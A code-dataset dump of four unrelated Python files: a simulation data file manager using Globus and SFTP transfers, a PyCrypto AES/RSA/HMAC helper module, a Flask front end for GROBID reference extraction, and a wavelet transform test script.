msg = 'Creating file table'
print_line(
line=msg,
event_list=self._event_list)
newfiles = list()
start_year = int(self._config['simulations']['start_year'])
end_year = int(self._config['simulations']['end_year'])
with DataFile._meta.database.atomic():
# for each case
for case in self._config['simulations']:
if case in ['start_year', 'end_year', 'comparisons']:
continue
# for each data type
for _type in self._config['data_types']:
data_types_for_case = self._config['simulations'][case]['data_types']
if 'all' not in data_types_for_case:
if _type not in data_types_for_case:
continue
# setup the base local_path
local_path = self.render_file_string(
data_type=_type,
data_type_option='local_path',
case=case)
new_files = list()
if self._config['data_types'][_type].get('monthly') and self._config['data_types'][_type]['monthly'] in ['True', 'true', '1', 1]:
# handle monthly data
for year in range(start_year, end_year + 1):
for month in range(1, 13):
filename = self.render_file_string(
data_type=_type,
data_type_option='file_format',
case=case,
year=year,
month=month)
r_path = self.render_file_string(
data_type=_type,
data_type_option='remote_path',
case=case,
year=year,
month=month)
new_files.append({
'name': filename,
'remote_path': os.path.join(r_path, filename),
'local_path': os.path.join(local_path, filename),
'local_status': FileStatus.NOT_PRESENT.value,
'case': case,
'remote_status': FileStatus.NOT_PRESENT.value,
'year': year,
'month': month,
'datatype': _type,
'local_size': 0,
'transfer_type': self._config['simulations'][case]['transfer_type'],
'remote_uuid': self._config['simulations'][case].get('remote_uuid', ''),
'remote_hostname': self._config['simulations'][case].get('remote_hostname', '')
})
else:
# handle one-off data
filename = self.render_file_string(
data_type=_type,
data_type_option='file_format',
case=case)
r_path = self.render_file_string(
data_type=_type,
data_type_option='remote_path',
case=case)
new_files.append({
'name': filename,
'remote_path': os.path.join(r_path, filename),
'local_path': os.path.join(local_path, filename),
'local_status': FileStatus.NOT_PRESENT.value,
'case': case,
'remote_status': FileStatus.NOT_PRESENT.value,
'year': 0,
'month': 0,
'datatype': _type,
'local_size': 0,
'transfer_type': self._config['simulations'][case]['transfer_type'],
'remote_uuid': self._config['simulations'][case].get('remote_uuid', ''),
'remote_hostname': self._config['simulations'][case].get('remote_hostname', '')
})
tail, _ = os.path.split(new_files[0]['local_path'])
if not os.path.exists(tail):
os.makedirs(tail)
step = 50
for idx in range(0, len(new_files), step):
DataFile.insert_many(
new_files[idx: idx + step]).execute()
msg = 'Database update complete'
print_line(msg, self._event_list)
def verify_remote_files(self, client, case):
"""
Check that the user supplied file paths are valid for remote files
Parameters:
client: either an ssh_client or a globus_client
case: the case to check remote paths for
"""
if not self._config['global']['verify']:
return True
msg = 'verifying remote file paths'
print_line(msg, self._event_list)
data_types_to_verify = []
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.local_status != FileStatus.PRESENT.value)))
for datafile in q.execute():
if datafile.datatype not in data_types_to_verify:
data_types_to_verify.append(datafile.datatype)
found_all = True
for datatype in data_types_to_verify:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype)))
files = q.execute()
remote_path, _ = os.path.split(files[0].remote_path)
msg = 'Checking {} files in {}'.format(datatype, remote_path)
print_line(msg, self._event_list)
if files[0].transfer_type == 'globus':
from lib.globus_interface import get_ls as globus_ls
remote_contents = globus_ls(
client=client,
path=remote_path,
endpoint=self._config['simulations'][case]['remote_uuid'])
elif files[0].transfer_type == 'sftp':
from lib.ssh_interface import get_ls as ssh_ls
remote_contents = ssh_ls(
client=client,
remote_path=remote_path)
remote_names = [x['name'] for x in remote_contents]
for df in files:
if df.name not in remote_names:
msg = 'Unable to find file {name} at {remote_path}'.format(
name=df.name,
remote_path=remote_path)
print_message(msg, 'error')
found_all = False
if not found_all:
return False
else:
msg = 'found all remote files for {}'.format(case)
print_message(msg, 'ok')
return True
def terminate_transfers(self):
self.kill_event.set()
for thread in self.thread_list:
msg = 'terminating {}, this may take a moment'.format(thread.name)
print_line(msg, self._event_list)
thread.join()
def print_db(self):
for df in DataFile.select():
print {
'case': df.case,
'type': df.datatype,
'name': df.name,
'local_path': df.local_path,
'remote_path': df.remote_path,
'transfer_type': df.transfer_type,
}
def add_files(self, data_type, file_list):
"""
Add files to the database
Parameters:
data_type (str): the data_type of the new files
file_list (list): a list of dictionaries in the format
local_path (str): path to the file,
case (str): the case these files belong to
name (str): the filename
remote_path (str): the remote path of these files, optional
transfer_type (str): the transfer type of these files, optional
year (int): the year of the file, optional
month (int): the month of the file, optional
remote_uuid (str): remote globus endpoint id, optional
remote_hostname (str): remote hostname for sftp transfer, optional
"""
try:
new_files = list()
for file in file_list:
new_files.append({
'name': file['name'],
'local_path': file['local_path'],
'local_status': file.get('local_status', FileStatus.NOT_PRESENT.value),
'datatype': data_type,
'case': file['case'],
'year': file.get('year', 0),
'month': file.get('month', 0),
'remote_uuid': file.get('remote_uuid', ''),
'remote_hostname': file.get('remote_hostname', ''),
'remote_path': file.get('remote_path', ''),
'remote_status': FileStatus.NOT_PRESENT.value,
'local_size': 0,
'transfer_type': file.get('transfer_type', 'local')
})
step = 50
for idx in range(0, len(new_files), step):
DataFile.insert_many(
new_files[idx: idx + step]).execute()
except Exception as e:
print_debug(e)
def update_local_status(self):
"""
Update the database with the local status of the expected files
Return True if there was new local data found, False othewise
"""
try:
query = (DataFile
.select()
.where(
(DataFile.local_status == FileStatus.NOT_PRESENT.value) |
(DataFile.local_status == FileStatus.IN_TRANSIT.value)))
printed = False
change = False
for datafile in query.execute():
marked = False
if os.path.exists(datafile.local_path):
if datafile.local_status == FileStatus.NOT_PRESENT.value or datafile.local_status == FileStatus.IN_TRANSIT.value:
datafile.local_status = FileStatus.PRESENT.value
marked = True
change = True
else:
if datafile.transfer_type == 'local':
msg = '{case} transfer_type is local, but {filename} is not present'.format(
case=datafile.case, filename=datafile.name)
logging.error(msg)
if not printed:
print_line(msg, self._event_list)
printed = True
if datafile.local_status == FileStatus.PRESENT.value:
datafile.local_status = FileStatus.NOT_PRESENT.value
marked = True
if marked:
datafile.save()
except Exception as e:
print_debug(e)
return change
def all_data_local(self):
"""
Returns True if all data is local, False otherwise
"""
try:
query = (DataFile
.select()
.where(
(DataFile.local_status == FileStatus.NOT_PRESENT.value) |
(DataFile.local_status == FileStatus.IN_TRANSIT.value)))
missing_data = query.execute()
# if any of the data is missing, not all data is local
if missing_data:
logging.debug('All data is not local, missing the following')
logging.debug([x.name for x in missing_data])
return False
except Exception as e:
print_debug(e)
logging.debug('All data is local')
return True
def transfer_needed(self, event_list, event, config):
"""
Start a transfer job for any files that arent local, but do exist remotely
Globus user must already be logged in
"""
# required files dont exist locally, do exist remotely
# or if they do exist locally have a different local and remote size
target_files = list()
try:
q = (DataFile
.select(DataFile.case)
.where(
DataFile.local_status == FileStatus.NOT_PRESENT.value))
caselist = [x.case for x in q.execute()]
if not caselist or len(caselist) == 0:
return
cases = list()
for case in caselist:
if case not in cases:
cases.append(case)
for case in cases:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.local_status == FileStatus.NOT_PRESENT.value)))
required_files = [x for x in q.execute()]
for file in required_files:
if file.transfer_type == 'local':
required_files.remove(file)
if not required_files:
msg = 'ERROR: all missing files are marked as local'
print_line(msg, event_list)
return
# mark files as in-transit so we dont double-copy
# cant do a bulk update since there may be to many records for the db to handle
step = 50
for idx in range(0, len(required_files), step):
q = (DataFile
.update({DataFile.local_status: FileStatus.IN_TRANSIT})
.where(DataFile.name << [x.name for x in required_files[idx: step + idx]]))
q.execute()
for file in required_files:
target_files.append({
'local_path': file.local_path,
'remote_path': file.remote_path,
})
if required_files[0].transfer_type == 'globus':
from lib.globus_interface import transfer as globus_transfer
from globus_cli.services.transfer import get_client as get_globus_client
msg = 'Starting globus file transfer of {} files'.format(
len(required_files))
print_line(msg, event_list)
msg = 'See https://www.globus.org/app/activity for transfer details'
print_line(msg, event_list)
client = get_globus_client()
if not self.verify_remote_files(client=client, case=case):
return False
remote_uuid = required_files[0].remote_uuid
local_uuid = self._config['global']['local_globus_uuid']
thread_name = '{}_globus_transfer'.format(required_files[0].case)
_args = (client, remote_uuid,
local_uuid, target_files,
self.kill_event)
thread = Thread(
target=globus_transfer,
name=thread_name,
args=_args)
self.thread_list.append(thread)
thread.start()
elif required_files[0].transfer_type == 'sftp':
from lib.ssh_interface import get_ssh_client
msg = 'Starting sftp file transfer of {} files'.format(
len(required_files))
print_line(msg, event_list)
client = get_ssh_client(required_files[0].remote_hostname)
if not self.verify_remote_files(client=client, case=case):
return False
thread_name = '{}_sftp_transfer'.format(required_files[0].case)
_args = (target_files, client, self.kill_event)
thread = Thread(
target=self._ssh_transfer,
name=thread_name,
args=_args)
self.thread_list.append(thread)
thread.start()
except Exception as e:
print_debug(e)
return False
def _ssh_transfer(self, target_files, client, event):
from lib.ssh_interface import transfer as ssh_transfer
sftp_client = client.open_sftp()
for file in target_files:
if event.is_set():
return
_, filename = os.path.split(file['local_path'])
msg = 'sftp transfer from {} to {}'.format(
file['remote_path'], file['local_path'])
logging.info(msg)
msg = 'starting sftp transfer for {}'.format(filename)
print_line(msg, self._event_list)
ssh_transfer(sftp_client, file)
msg = 'sftp transfer complete for {}'.format(filename)
print_line(msg, self._event_list)
msg = self.report_files_local()
print_line(msg, self._event_list)
def report_files_local(self):
"""
Return a string in the format 'X of Y files availabe locally' where X is the number here, and Y is the total
"""
q = (DataFile
.select(DataFile.local_status)
.where(DataFile.local_status == FileStatus.PRESENT.value))
local = len([x.local_status for x in q.execute()])
q = (DataFile.select(DataFile.local_status))
total = len([x.local_status for x in q.execute()])
msg = '{local}/{total} files available locally or {prec:.2f}%'.format(
local=local, total=total, prec=((local*1.0)/total)*100)
return msg
def get_file_paths_by_year(self, datatype, case, start_year=None, end_year=None):
"""
Return paths to files that match the given type, start, and end year
Parameters:
datatype (str): the type of data
case (str): the name of the case to return files for
monthly (bool): is this datatype monthly frequency
start_year (int): the first year to return data for
end_year (int): the last year to return data for
"""
try:
if start_year and end_year:
if datatype in ['climo_regrid', 'climo_native', 'ts_regrid', 'ts_native']:
query = (DataFile
.select()
.where(
(DataFile.month == end_year) &
(DataFile.year == start_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
else:
query = (DataFile
.select()
.where(
(DataFile.year <= end_year) &
(DataFile.year >= start_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
else:
query = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
datafiles = query.execute()
if datafiles is None or len(datafiles) == 0:
return None
return [x.local_path for x in datafiles]
except Exception as e:
print_debug(e)
| lib/filemanager.py | 28,848 | TODO: make this better setup the replacement dict for each case for each data type setup the base local_path handle monthly data handle one-off data if any of the data is missing, not all data is local required files dont exist locally, do exist remotely or if they do exist locally have a different local and remote size mark files as in-transit so we dont double-copy cant do a bulk update since there may be to many records for the db to handle | 447 | en | 0.850178 |
import os
import base64
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Hash import MD5
from Crypto.Hash import SHA
from Crypto.Hash import SHA256
## needs to be imported from hashlib, libcrypto
## versions do not have a block_size member var
from hashlib import sha256 as HMAC_HASH
from hmac import HMAC as HMAC_FUNC
try:
from Crypto.Cipher import PKCS1_OAEP as RSA_PAD_SCHEME
except ImportError:
RSA_PAD_SCHEME = None
try:
from Crypto.Signature import PKCS1_v1_5 as RSA_SGN_SCHEME
except ImportError:
RSA_SGN_SCHEME = None
## needed because RSAobj::operator== fails on None
RSA_NULL_KEY_OBJ = RSA._RSAobj(None, None)
AES_KEY_BIT_SIZE = 32 * 8
AES_KEY_DIR_NAME = "./"
AES_RAW_KEY_FILE = "aes_key.dat"
AES_MSG_PAD_SIZE = 64
RSA_KEY_BIT_SIZE = 8192
RSA_KEY_FMT_NAME = "PEM"
RSA_KEY_DIR_NAME = "./"
RSA_PUB_KEY_FILE = "rsa_pub_key.pem"
RSA_PRI_KEY_FILE = "rsa_pri_key.pem"
DATA_MARKER_BYTE = "\x01"
DATA_PARTIT_BYTE = "\n"
UNICODE_ENCODING = "utf-8"
PWRD_HASH_ROUNDS = 1024 ## stretching KDF (anti-BFA)
USR_DB_SALT_SIZE = 16 ## bytes
MIN_AES_KEY_SIZE = 16 ## bytes
MIN_PASSWORD_LEN = 12 ## bytes
## hashlib.sha{1,256}
MD5LEG_HASH_FUNC = MD5.new
SHA256_HASH_FUNC = SHA256.new
GLOBAL_RAND_POOL = Random.new()
def null_encode(s): return s
def null_decode(s): return s
def safe_decode(s, decode_func = base64.b64decode):
try:
r = decode_func(s)
except:
## if <s> is not a base64-encoded string, then
## it probably contains plaintext (UTF-8) data
r = s
return r
def extract_message_and_auth_code(raw_data_blob):
if (raw_data_blob[0] != DATA_MARKER_BYTE):
return ("", "")
i = 1
j = raw_data_blob.find(DATA_MARKER_BYTE, i)
## check if a MAC is included after the payload
if (j != -1):
msg = raw_data_blob[i : j]
mac = raw_data_blob[j + 1: ]
else:
msg = raw_data_blob[i: ]
mac = ""
return (msg, mac)
def encrypt_sign_message(aes_obj, raw_msg, use_macs):
assert(type(raw_msg) == str)
assert(isinstance(aes_obj, aes_cipher))
ret_enc_msg = ""
ret_msg_mac = ""
if (use_macs):
## enc_msg_mac := (enc_msg, msg_mac)
enc_msg_mac = aes_obj.encrypt_sign_bytes(raw_msg)
ret_enc_msg = DATA_MARKER_BYTE + enc_msg_mac[0]
ret_msg_mac = DATA_MARKER_BYTE + enc_msg_mac[1]
else:
raw_enc_msg = aes_obj.encrypt_encode_bytes(raw_msg)
ret_enc_msg = DATA_MARKER_BYTE + raw_enc_msg
return (ret_enc_msg + ret_msg_mac + DATA_PARTIT_BYTE)
def decrypt_auth_message(aes_obj, raw_msg, use_macs):
assert(type(raw_msg) == str)
assert(isinstance(aes_obj, aes_cipher))
## enc_msg_mac := (enc_msg, msg_mac)
enc_msg_mac = extract_message_and_auth_code(raw_msg)
## missing lead marker byte
if (len(enc_msg_mac[0]) == 0):
return ""
if (use_macs):
dec_msg = aes_obj.auth_decrypt_bytes(enc_msg_mac, safe_decode)
else:
dec_msg = aes_obj.decode_decrypt_bytes(enc_msg_mac[0], safe_decode)
return dec_msg
def verify_message_auth_code(our_mac, msg_mac, ses_key):
## two rounds closes a timing side-channel
msg_mac = HMAC_FUNC(ses_key, msg_mac, HMAC_HASH)
our_mac = HMAC_FUNC(ses_key, our_mac, HMAC_HASH)
msg_mac = msg_mac.digest()
our_mac = our_mac.digest()
num_val = 0
if (len(msg_mac) != len(our_mac)):
return False
## fixed linear-time comparison closes another
for i in xrange(len(our_mac)):
num_val += (our_mac[i] == msg_mac[i])
return (num_val == len(our_mac))
def int32_to_str(n):
assert(n >= (0 ))
assert(n < (1 << 32))
s = ""
s += "%c" % ((n >> 0) & 0xff)
s += "%c" % ((n >> 8) & 0xff)
s += "%c" % ((n >> 16) & 0xff)
s += "%c" % ((n >> 24) & 0xff)
return s
def str_to_int32(s):
n = 0
n += (ord(s[0]) << 0)
n += (ord(s[1]) << 8)
n += (ord(s[2]) << 16)
n += (ord(s[3]) << 24)
return n
def pad_str(msg, bs):
num = bs - (len(msg) % bs)
ext = num * chr(num)
return (msg + ext)
def unpad_str(msg, bs):
idx = len(msg) - 1
cnt = ord(msg[idx: ])
return msg[0: -cnt]
def read_file(file_name, file_mode):
try:
f = open(file_name, file_mode)
s = f.read()
f = f.close()
return s
except IOError:
pass
return ""
def write_file(file_name, file_mode, file_data):
try:
f = open(file_name, file_mode)
os.fchmod(f.fileno(), 0600)
f.write("%s" % file_data)
f = f.close()
except IOError:
pass
class rsa_cipher:
def __init__(self, key_dir = RSA_KEY_DIR_NAME):
self.set_rnd_gen(Random.new())
self.set_instance_keys(key_dir)
self.set_pad_scheme(RSA_PAD_SCHEME)
self.set_sgn_scheme(RSA_SGN_SCHEME)
def set_rnd_gen(self, rnd_gen): self.rnd_gen = rnd_gen
def set_pub_key(self, pub_key): self.pub_key = pub_key
def set_pri_key(self, pri_key): self.pri_key = pri_key
def get_pub_key(self): return self.pub_key
def get_pri_key(self): return self.pri_key
def sanity_test_keys(self):
pk = (self.pri_key.publickey())
b0 = (pk == self.pub_key)
b1 = (pk.exportKey(RSA_KEY_FMT_NAME) == self.pub_key.exportKey(RSA_KEY_FMT_NAME))
b2 = ((not self.pub_key.has_private()) and self.pri_key.has_private())
return (b0 and b1 and b2)
def set_pad_scheme(self, scheme):
if (scheme == None):
self.enc_pad_scheme = None
self.dec_pad_scheme = None
else:
self.enc_pad_scheme = scheme.new(self.pub_key)
self.dec_pad_scheme = scheme.new(self.pri_key)
def set_sgn_scheme(self, scheme):
if (scheme == None):
self.msg_sign_scheme = None
self.msg_auth_scheme = None
else:
self.msg_sign_scheme = scheme.new(self.pri_key)
self.msg_auth_scheme = scheme.new(self.pub_key)
def set_instance_keys(self, key_dir):
if (key_dir == None):
self.set_pub_key(RSA_NULL_KEY_OBJ)
self.set_pri_key(RSA_NULL_KEY_OBJ)
return
if (not self.import_keys(key_dir)):
self.generate_keys()
assert(self.sanity_test_keys())
def generate_keys(self, num_bits = RSA_KEY_BIT_SIZE):
self.set_pri_key(RSA.generate(num_bits, self.rnd_gen.read))
self.set_pub_key(self.pri_key.publickey())
return True
def import_key(self, key_str):
return (RSA.importKey(key_str))
def import_keys(self, key_dir):
assert(len(key_dir) == 0 or key_dir[-1] == '/')
pub_key_str = read_file(key_dir + RSA_PUB_KEY_FILE, "r")
pri_key_str = read_file(key_dir + RSA_PRI_KEY_FILE, "r")
if (len(pub_key_str) != 0 and len(pri_key_str) != 0):
self.set_pub_key(self.import_key(pub_key_str))
self.set_pri_key(self.import_key(pri_key_str))
return True
return False
def export_keys(self, key_dir):
assert(len(key_dir) != 0)
assert(key_dir[-1] == '/')
if (not os.path.isdir(key_dir)):
os.mkdir(key_dir, 0700)
write_file(key_dir + RSA_PUB_KEY_FILE, "w", self.pub_key.exportKey(RSA_KEY_FMT_NAME))
write_file(key_dir + RSA_PRI_KEY_FILE, "w", self.pri_key.exportKey(RSA_KEY_FMT_NAME))
## these make sure that any native unicode inputs are converted
## to standard (UTF-8 encoded byte sequences) strings, otherwise
## crypto operations might be undefined
def encrypt_encode_bytes_utf8(self, raw_bytes, encode_func = base64.b64encode):
return (self.encrypt_encode_bytes(raw_bytes.encode(UNICODE_ENCODING), encode_func))
def decode_decrypt_bytes_utf8(self, enc_bytes, decode_func = base64.b64decode):
return (self.decode_decrypt_bytes(enc_bytes.encode(UNICODE_ENCODING), decode_func))
def encrypt_encode_bytes(self, raw_bytes, encode_func = base64.b64encode):
assert(type(raw_bytes) == str)
assert(len(raw_bytes) != 0)
assert(self.pub_key.size() >= (len(raw_bytes) * 8))
assert(ord(raw_bytes[0]) != 0)
if (self.enc_pad_scheme != None):
enc_bytes = self.enc_pad_scheme.encrypt(raw_bytes)
else:
## NOTE: RSAobj.encrypt() returns a tuple (!)
enc_bytes = self.pub_key.encrypt(raw_bytes, "")[0]
return (encode_func(enc_bytes))
def decode_decrypt_bytes(self, enc_bytes, decode_func = base64.b64decode):
assert(type(enc_bytes) == str)
assert(len(enc_bytes) != 0)
## assert((self.pri_key.size() + 1) == (len(decode_func(enc_bytes)) * 8))
enc_bytes = decode_func(enc_bytes)
if (self.dec_pad_scheme != None):
dec_bytes = self.dec_pad_scheme.decrypt(enc_bytes)
else:
dec_bytes = self.pri_key.decrypt(enc_bytes)
return dec_bytes
def sign_bytes_utf8(self, msg_bytes):
return (self.sign_bytes(msg_bytes.encode(UNICODE_ENCODING)))
def auth_bytes_utf8(self, msg_bytes, sig_bytes):
return (self.auth_bytes(msg_bytes.encode(UNICODE_ENCODING), sig_bytes))
def sign_bytes(self, msg_bytes):
assert(type(msg_bytes) == str)
assert(len(msg_bytes) != 0)
msg_bytes = SHA256_HASH_FUNC(msg_bytes)
if (self.msg_sign_scheme != None):
## scheme.sign() expects an object from Crypto.Hash
ret = self.msg_sign_scheme.sign(msg_bytes)
else:
## RSAobj.sign() returns a tuple
ret = str(self.pri_key.sign(msg_bytes.digest(), "")[0])
assert(type(ret) == str)
return ret
def auth_bytes(self, msg_bytes, sig_bytes):
assert(type(msg_bytes) == str)
assert(type(sig_bytes) == str)
assert(len(msg_bytes) != 0)
msg_bytes = SHA256_HASH_FUNC(msg_bytes)
if (self.msg_auth_scheme != None):
## scheme.verify() expects an object from Crypto.Hash
ret = self.msg_auth_scheme.verify(msg_bytes, sig_bytes)
else:
## RSAobj.verify() expects a tuple
ret = (self.pub_key.verify(msg_bytes.digest(), (long(sig_bytes), 0L)))
assert(type(ret) == bool)
return ret
class aes_cipher:
def __init__(self, key_dir = AES_KEY_DIR_NAME, padding_length = AES_MSG_PAD_SIZE):
assert(type(key_dir) == str)
assert((padding_length % 16) == 0)
self.pad_length = padding_length
self.random_gen = Random.new()
self.khash_func = SHA256_HASH_FUNC
self.set_instance_key(key_dir)
def set_instance_key(self, key_dir):
if (not self.import_key(key_dir)):
self.set_key(self.generate_key(""))
def generate_key(self, raw_key, key_len = AES_KEY_BIT_SIZE):
if (len(raw_key) == 0):
key_str = self.random_gen.read(key_len / 8)
key_str = self.khash_func(key_str)
else:
key_str = self.khash_func(raw_key)
return (key_str.digest())
def get_key(self): return self.key_string
def set_key(self, s): self.key_string = s
def import_key(self, key_dir):
assert(len(key_dir) == 0 or key_dir[-1] == '/')
key_str = read_file(key_dir + AES_RAW_KEY_FILE, "rb")
if (len(key_str) != 0):
self.set_key(key_str)
return True
return False
def export_key(self, key_dir):
assert(len(key_dir) != 0)
assert(key_dir[-1] == '/')
if (not os.path.isdir(key_dir)):
os.mkdir(key_dir, 0700)
write_file(key_dir + AES_RAW_KEY_FILE, "wb", self.get_key())
def encrypt_encode_bytes_utf8(self, raw_bytes, encode_func = base64.b64encode):
return (self.encrypt_encode_bytes(raw_bytes.encode(UNICODE_ENCODING), encode_func))
def decode_decrypt_bytes_utf8(self, enc_bytes, decode_func = base64.b64decode):
return (self.decode_decrypt_bytes(enc_bytes.encode(UNICODE_ENCODING), decode_func))
def encrypt_encode_bytes(self, raw_bytes, encode_func = base64.b64encode):
assert(type(raw_bytes) == str)
assert(len(raw_bytes) != 0)
ini_vector = self.random_gen.read(AES.block_size)
aes_object = AES.new(self.key_string, AES.MODE_CBC, ini_vector)
pad_bytes = pad_str(raw_bytes, self.pad_length)
enc_bytes = aes_object.encrypt(pad_bytes)
return (encode_func(ini_vector + enc_bytes))
def decode_decrypt_bytes(self, enc_bytes, decode_func = base64.b64decode):
assert(type(enc_bytes) == str)
assert(len(enc_bytes) != 0)
enc_bytes = decode_func(enc_bytes)
ini_vector = enc_bytes[0: AES.block_size]
aes_object = AES.new(self.key_string, AES.MODE_CBC, ini_vector)
dec_bytes = aes_object.decrypt(enc_bytes[AES.block_size: ])
dec_bytes = unpad_str(dec_bytes, self.pad_length)
return dec_bytes
def encrypt_sign_bytes_utf8(self, raw_msg, encode_func = base64.b64encode):
return (self.encrypt_sign_bytes(raw_msg.encode(UNICODE_ENCODING), encode_func))
def auth_decrypt_bytes_utf8(self, (enc_msg, msg_mac), decode_func = base64.b64decode):
return (self.auth_decrypt_bytes((enc_msg.encode(UNICODE_ENCODING), msg_mac.encode(UNICODE_ENCODING)), decode_func))
def encrypt_sign_bytes(self, raw_msg, encode_func = base64.b64encode):
assert(type(raw_msg) == str)
## encrypt, then sign (HMAC = H((K ^ O) | H((K ^ I) | M)))
enc_msg = self.encrypt_encode_bytes(raw_msg, null_encode)
msg_mac = HMAC_FUNC(self.get_key(), enc_msg, HMAC_HASH)
msg_mac = encode_func(msg_mac.digest())
enc_msg = encode_func(enc_msg)
return (enc_msg, msg_mac)
def auth_decrypt_bytes(self, (enc_msg, msg_mac), decode_func = base64.b64decode):
assert(type(enc_msg) == str)
assert(type(msg_mac) == str)
## auth, then decrypt
msg_mac = decode_func(msg_mac)
enc_msg = decode_func(enc_msg)
our_mac = HMAC_FUNC(self.get_key(), enc_msg, HMAC_HASH)
our_mac = our_mac.digest()
if (verify_message_auth_code(our_mac, msg_mac, self.get_key())):
return (self.decode_decrypt_bytes(enc_msg, null_decode))
## counts as false
return ""
| CryptoHandler.py | 12,848 | needs to be imported from hashlib, libcrypto versions do not have a block_size member var needed because RSAobj::operator== fails on None stretching KDF (anti-BFA) bytes bytes bytes hashlib.sha{1,256} if <s> is not a base64-encoded string, then it probably contains plaintext (UTF-8) data check if a MAC is included after the payload enc_msg_mac := (enc_msg, msg_mac) enc_msg_mac := (enc_msg, msg_mac) missing lead marker byte two rounds closes a timing side-channel fixed linear-time comparison closes another these make sure that any native unicode inputs are converted to standard (UTF-8 encoded byte sequences) strings, otherwise crypto operations might be undefined NOTE: RSAobj.encrypt() returns a tuple (!) assert((self.pri_key.size() + 1) == (len(decode_func(enc_bytes)) * 8)) scheme.sign() expects an object from Crypto.Hash RSAobj.sign() returns a tuple scheme.verify() expects an object from Crypto.Hash RSAobj.verify() expects a tuple encrypt, then sign (HMAC = H((K ^ O) | H((K ^ I) | M))) auth, then decrypt counts as false | 1,037 | en | 0.635182 |
from flask import Flask
from flask import request, session, render_template, json, Response, jsonify, make_response, send_file, redirect, url_for
import requests
import xml.etree.ElementTree as ET
import lxml
import pandas as pd
import re
app = Flask(__name__)
@app.route('/')
def index():
return render_template('process_fulltext.html')
@app.route('/process_fulltext', methods = ['GET', 'POST'])
def process_fulltext():
upload = request.files.get('file', '').read() #puts the uploaded file (in the request)
url = 'http://localhost:8070/api/processFulltextDocument'
files = dict(input=upload, teiCoordinates="biblStruct")
r = requests.post(url, files=files)
return render_template('process_fulltext.html', r=r.text)
# takes a string and removes xml element inside
def clean(text):
text = re.sub("<[^>]+>","", text)
text = re.sub("^\s+|\s+$","", text)
return text
#parses the tei document and creates list of dictionaries out of tei elements
def parse_tei(xml):
#data = open(xml)
data = xml.split('\n')
refs = []
ref = []
start = False
title = ""
name = ""
date = ""
names = []
year = ""
#art_name = re.sub(".*\/","")
old_ref = {"title": "", "name": "", "date": "", "year_pub": ""}
for line in data:
if re.match(".*<date",line) and start == False:
year = re.sub(".*when\=\"","",line)
year = re.sub("\".*","",year)[0:4]
if start == False and re.match(".*<back",line):
start = True
if start == False:
continue
if re.match(".*<biblStruct",line):
if title == "":
continue
ref = {"title": title, "name": names, "date": date, "year_pub": year}
if ref["title"] == old_ref["title"]:
continue
else:
refs.append(ref)
olf_ref = ref
names = []
if re.match(".*<title.*type=\"main\"",line):
title = clean(line)
if re.match(".*<persName",line):
forename = re.sub("<\/forename.*","",line)
forename = clean(forename)
surname = re.sub(".*<surname","",line)
surname = clean(surname)
surname = re.sub(">",". ",surname)
name = forename+surname
names.append(name)
if re.match(".*<date",line):
date = re.sub(".*when\=\"","",line)
date = re.sub("\".*","",date)
date = date[0:4]
return refs
# sends request to grobid api to process the pdf and returns data in dataframe to template view
@app.route('/process_references', methods = ['GET', 'POST'])
def process_references():
upload = request.files.get('file', '').read() #puts the uploaded file (in the request)
url = 'http://localhost:8070/api/processFulltextDocument'
files = dict(input=upload, teiCoordinates="biblStruct")
r = requests.post(url, files=files)
tei_list = parse_tei(r.text)
# increase the column width of pd (standard is only 50px)
pd.set_option('display.max_colwidth', -1)
df1 = pd.DataFrame(tei_list)
# removing year_pub column
df1 = df1.drop('year_pub', axis=1)
df2 = df1.to_json()
df1 = df1.to_html()
# changing css class in html for dataframe output
df1 = re.sub("dataframe", "myTable", df1)
return render_template('process_fulltext.html', df1=df1, df2=df2)
if __name__ == '__main__':
app.run(debug=True) | TrackA_python/codesprintapp/views.py | 3,132 | puts the uploaded file (in the request) takes a string and removes xml element insideparses the tei document and creates list of dictionaries out of tei elementsdata = open(xml)art_name = re.sub(".*\/","") sends request to grobid api to process the pdf and returns data in dataframe to template viewputs the uploaded file (in the request) increase the column width of pd (standard is only 50px) removing year_pub column changing css class in html for dataframe output | 467 | en | 0.789557 |
import math
import numpy as np
from cpp2py_test.bior_2d_forward_test1 import original_bior_2d_forward, bior15_coef
def bior_2d_forward(img):
assert img.shape[0] == img.shape[1]
N = img.shape[0]
iter_max = int(math.log2(N))
for iter in range(iter_max):
coeffs2 = pywt.dwt2(img[:N, :N], 'bior1.5', mode='periodic')
LL, (LH, HL, HH) = coeffs2
img[:N//2, :N//2] = LL[2: -2, 2: -2]
img[N//2:N, N//2:N] = HH[2: -2, 2: -2]
img[:N//2, N//2:N] = -HL[2: -2, 2: -2]
img[N//2:N, :N//2] = -LH[2: -2, 2: -2]
N //= 2
return img
if __name__ == '__main__':
import cv2
import pywt
import matplotlib.pyplot as plt
img = cv2.imread('Cameraman256.png', cv2.IMREAD_GRAYSCALE)
img = img.astype(np.float64)
# img = img[0:8, 0:8]
# original way
original_bior_img = original_bior_2d_forward(img)
# my way
bior_img = bior_2d_forward(img.copy())
# a, b = 0, 8
# c, d = 0, 8
# print('original_bior_img\n', original_bior_img[a:b, c:d].astype(np.int))
# print('bior_img\n', bior_img[a:b, c:d].astype(np.int))
# print('max original_bior_img', np.max(original_bior_img))
# print('min original_bior_img', np.min(original_bior_img))
#
# print('max bior_img', np.max(bior_img))
# print('min bior_img', np.min(bior_img))
diff = original_bior_img - bior_img
print('sum of diff', np.sum(np.abs(diff)))
print('max of diff', np.max(np.abs(diff)))
cv2.imshow('original_bior_img', original_bior_img)
cv2.imshow('bior_img', bior_img)
cv2.imshow('diff', diff)
cv2.waitKey()
